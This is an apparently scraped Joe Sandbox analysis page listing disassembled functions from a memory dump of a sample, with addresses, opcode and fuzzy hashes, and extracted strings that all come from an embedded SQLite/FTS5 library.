                                                                                                                                                                                                                              Function 00007FFB0C6E46C0 Relevance: 16.0, Strings: 12, Instructions: 1030COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ascii$bm25$fts5$fts5_get_locale$fts5_locale$fts5_source_id$highlight$porter$snippet$trigram$unable to delete/modify user-function due to active statements$unicode61
                                                                                                                                                                                                                              • API String ID: 0-4043592257
                                                                                                                                                                                                                              • Opcode ID: 5a97417b68fda1cc2b05fa7d698c2bbf5caac5caed2120627807f30a7dc0b696
                                                                                                                                                                                                                              • Instruction ID: a1269b196e9c70c39fd1ba4824d6abb4282890cdff6d00260af6ed8fec124180
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a97417b68fda1cc2b05fa7d698c2bbf5caac5caed2120627807f30a7dc0b696
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86A2A1E2A09B4286EB6A8F35D958AB923A5FF44B88F444137EA4F07395DF3CE455C300
                                                                                                                                                                                                                              Function 00007FFB0C727A30 Relevance: 15.5, Strings: 12, Instructions: 472COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: PRIMARY KEY$UNIQUE$UPDATE "%w".sqlite_master SET sql = sqlite_drop_column(%d, sql, %d) WHERE (type=='table' AND tbl_name=%Q COLLATE nocase)$after drop column$cannot %s %s "%s"$cannot drop %s column: "%s"$cannot drop column "%s": no other columns exist$drop column from$no such column: "%T"$q$view$virtual table
                                                                                                                                                                                                                              • API String ID: 0-74819023
                                                                                                                                                                                                                              • Opcode ID: 7c9c1350548b3c45b0d0cf0d64804b1f4f04c3b21d22e22a8189cc0807441005
                                                                                                                                                                                                                              • Instruction ID: ee68f17a075740c66fa7db2f7e5cc0a2ba80ff60ab638727bbbcdda13e1a1fd9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c9c1350548b3c45b0d0cf0d64804b1f4f04c3b21d22e22a8189cc0807441005
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA22ADF2A086868AD764CF26D088EBA77A5FF84B84F518136EA8E47795DF3DD441C700
                                                                                                                                                                                                                              Function 00007FFB0C6D2FD0 Relevance: 13.1, Strings: 9, Instructions: 1892COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$%s_segments$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$block$misuse$K
                                                                                                                                                                                                                              • API String ID: 0-3956881941
                                                                                                                                                                                                                              • Opcode ID: 078be2cb82fe475e00247dfe45d6048175e603bb34f10f66713d1383a0d428a5
                                                                                                                                                                                                                              • Instruction ID: 17694ff5834eb90382da8b4b781681b10d2af960b93382bdfa746f7a1581f5d2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 078be2cb82fe475e00247dfe45d6048175e603bb34f10f66713d1383a0d428a5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC038AE2E09B4286EB668F75D858B7827A1FF44B88F044536EE0E577A4CF3CE8459341
                                                                                                                                                                                                                              Function 00007FFB0C70CD0F Relevance: 12.2, Strings: 9, Instructions: 991COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %r %s BY term out of range - should be between 1 and %d$INTERSECT$LEFT$MERGE (%s)$ORDER$RIGHT$UNION$too many terms in %s BY clause$g
                                                                                                                                                                                                                              • API String ID: 0-3976573709
                                                                                                                                                                                                                              • Opcode ID: 923cc748c2a532d436179f4fbeec89efe2f6068ec0f17b4356e66b78e043d76d
                                                                                                                                                                                                                              • Instruction ID: 573204d13e07b267b6664bbc4578761e93a6ddfd87dac8e7814fcb2087082ebb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 923cc748c2a532d436179f4fbeec89efe2f6068ec0f17b4356e66b78e043d76d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AB25AF2A09B82C6EBA49F25E448AB977A5FF44B84F244436DA8E07765DF3DE441C700
                                                                                                                                                                                                                              Function 00007FFB0C67B930 Relevance: 10.4, Strings: 8, Instructions: 392COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s a subset of columns on fts5 contentless-delete table: %s$%s contentless fts5 table: %s$'delete' may not be used with a contentless_delete=1 table$cannot DELETE from contentless fts5 table: %s$cannot UPDATE$delete$fts5_locale() requires locale=1$version
                                                                                                                                                                                                                              • API String ID: 0-2196455284
                                                                                                                                                                                                                              • Opcode ID: 2b6913b390b1c84940994affae7c9a8ac6093eb483c3c98b383ccebf530296ed
                                                                                                                                                                                                                              • Instruction ID: 4f34b03b68755d01cf5d3f10cb67ecb007c92359c89e4169d3183095cec30532
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b6913b390b1c84940994affae7c9a8ac6093eb483c3c98b383ccebf530296ed
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EF1D6E2A0864387EB719A36D858E7A2790FF84784F208631EF5E47699DF3CE4518740
                                                                                                                                                                                                                              Function 00007FFB0C7886B0 Relevance: 10.4, Strings: 8, Instructions: 385COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                                                                                                                                                                                              • API String ID: 0-875588658
                                                                                                                                                                                                                              • Opcode ID: bf43de3a7a1ef586eda6972bc2beddbcc110bd200d6249d6b8ac2510eef92ec7
                                                                                                                                                                                                                              • Instruction ID: 4df5fc5df173b3b85ee89fe8c2a7df477d9b175c562196ed82b0cf0e78aa0cf9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf43de3a7a1ef586eda6972bc2beddbcc110bd200d6249d6b8ac2510eef92ec7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A026DE2F4864289FB62CB75D448ABC27A1AF44788F844132DE4E576D9DF3CE449C34A
                                                                                                                                                                                                                              Function 00007FFB0C6AFBD0 Relevance: 10.2, Strings: 7, Instructions: 1439COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: @$BINARY$E$Expression tree is too large (maximum depth %d)$NOCASE$ON clause references tables to its right$false
                                                                                                                                                                                                                              • API String ID: 0-1048875598
                                                                                                                                                                                                                              • Opcode ID: c37775dcafb2c9ca56a1ff290019ec1c019d98b367699c81505ae858e2e54189
                                                                                                                                                                                                                              • Instruction ID: 8047f9ae4dd09ade9631ccfe5c6fd65b7fb9e391e8b66fde3ed575205f1c384e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c37775dcafb2c9ca56a1ff290019ec1c019d98b367699c81505ae858e2e54189
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5D2DDE2A0868186EB768B66C948B7E7BA1FF49B84F045132EE5D47785DF3CE491C700
                                                                                                                                                                                                                              Function 00007FFB0C745810 Relevance: 9.9, Strings: 7, Instructions: 1130COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse$K
                                                                                                                                                                                                                              • API String ID: 0-3625987951
                                                                                                                                                                                                                              • Opcode ID: 372c448508bd327ddcd881427b2f7c790634e4d86250a6e64fdab9af79e6c5bc
                                                                                                                                                                                                                              • Instruction ID: cfd5febea42e23f567002636049374522843918efc32845d43f93c455766545f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 372c448508bd327ddcd881427b2f7c790634e4d86250a6e64fdab9af79e6c5bc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9B27BF2B09B4286EBA48F75D458BB837A5AF45B88F044136DE0E57795DF3CE8458340
                                                                                                                                                                                                                              Function 00007FFB0C70CDCA Relevance: 9.5, Strings: 7, Instructions: 768COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: LEFT$MERGE (%s)$ORDER$RIGHT$UNION$too many terms in %s BY clause$g
                                                                                                                                                                                                                              • API String ID: 0-3346138532
                                                                                                                                                                                                                              • Opcode ID: bfa8ccc286add4e7574ec9bcdde002d14d4b37fe795130a8d25155253f5d1388
                                                                                                                                                                                                                              • Instruction ID: 22d0f1ee52f94a4fcef7bc81fb1b7c53782ca98c79c070c7c6a2f592dbfbfe17
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfa8ccc286add4e7574ec9bcdde002d14d4b37fe795130a8d25155253f5d1388
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D824EF2608681C6E7B49F25E448AAAB7A5FF94B84F244436DB8E07B55DF3DE441CB00
                                                                                                                                                                                                                              Function 00007FFB0C70CD82 Relevance: 9.5, Strings: 7, Instructions: 725COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: LEFT$MERGE (%s)$ORDER$RIGHT$UNION$too many terms in %s BY clause$g
                                                                                                                                                                                                                              • API String ID: 0-3346138532
                                                                                                                                                                                                                              • Opcode ID: 31045656e8ee966943db61b51eeccfaadc4af08e63607a43928766a9e49b298b
                                                                                                                                                                                                                              • Instruction ID: 5a7d1d049c2f6b5ba0e94d535edd04b87c56ca3f525e0cdeba5760edb0b3e31f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31045656e8ee966943db61b51eeccfaadc4af08e63607a43928766a9e49b298b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C724DF2608681C6E7B49F25E448AAAB7A1FF94B84F244436DB8E47B55DF3DE441CB00
                                                                                                                                                                                                                              Function 00007FFB0C71D940 Relevance: 9.3, Strings: 7, Instructions: 553COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %r %s BY term out of range - should be between 1 and %d$%r ORDER BY term does not match any column in the result set$GROUP$HAVING clause on a non-aggregate query$ORDER$aggregate functions are not allowed in the GROUP BY clause$too many terms in ORDER BY clause
                                                                                                                                                                                                                              • API String ID: 0-2302332886
                                                                                                                                                                                                                              • Opcode ID: bb623a9a2c18d20b81f837a5029010e69f6c694c5b79584c483b8187198777e4
                                                                                                                                                                                                                              • Instruction ID: 2f8f68e1eb4aedf728ccb9a4e018dab20bd37f8dda5b1e67d94910f0b0a29bc0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb623a9a2c18d20b81f837a5029010e69f6c694c5b79584c483b8187198777e4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 503269F2A086428AEB25CF79C588AA937A5FF54B88F145036DE0D477A5EF38E455C700
                                                                                                                                                                                                                              Function 00007FFB0C6D96B0 Relevance: 9.2, Strings: 6, Instructions: 1750COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$DELETE FROM '%q'.'%q_idx' WHERE (segid, (pgno/2)) = (?1, ?2)$REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)$block$misuse
                                                                                                                                                                                                                              • API String ID: 0-1819929800
                                                                                                                                                                                                                              • Opcode ID: 6957eb0a29fed5253a688e71034a2f6c56332714ccf9af88f8654fc03cd0c5d4
                                                                                                                                                                                                                              • Instruction ID: 4177babdd195dfca36eda1be8a1e7af711ba495370dbaa83ec33870f00191b6a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6957eb0a29fed5253a688e71034a2f6c56332714ccf9af88f8654fc03cd0c5d4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70F27BF2E09A428AEB65CF75D858A7827A1FF44B84F054036EA4E47796DF3CE845E340
                                                                                                                                                                                                                              Function 00007FFB0C695624 Relevance: 9.2, Strings: 7, Instructions: 440COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: -$-Inf$0123456789ABCDEF0123456789abcdef$NaN$VUUU$gfff$null
                                                                                                                                                                                                                              • API String ID: 0-3207396689
                                                                                                                                                                                                                              • Opcode ID: 3400c222d2f1589d09601d32e5282ad1dca2b0443e562031bc8d258cfde1692b
                                                                                                                                                                                                                              • Instruction ID: a6b41d9f3fb0e337151ef28e6443bb84a1fe323fa42a321f43aa03c5533f24c0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3400c222d2f1589d09601d32e5282ad1dca2b0443e562031bc8d258cfde1692b
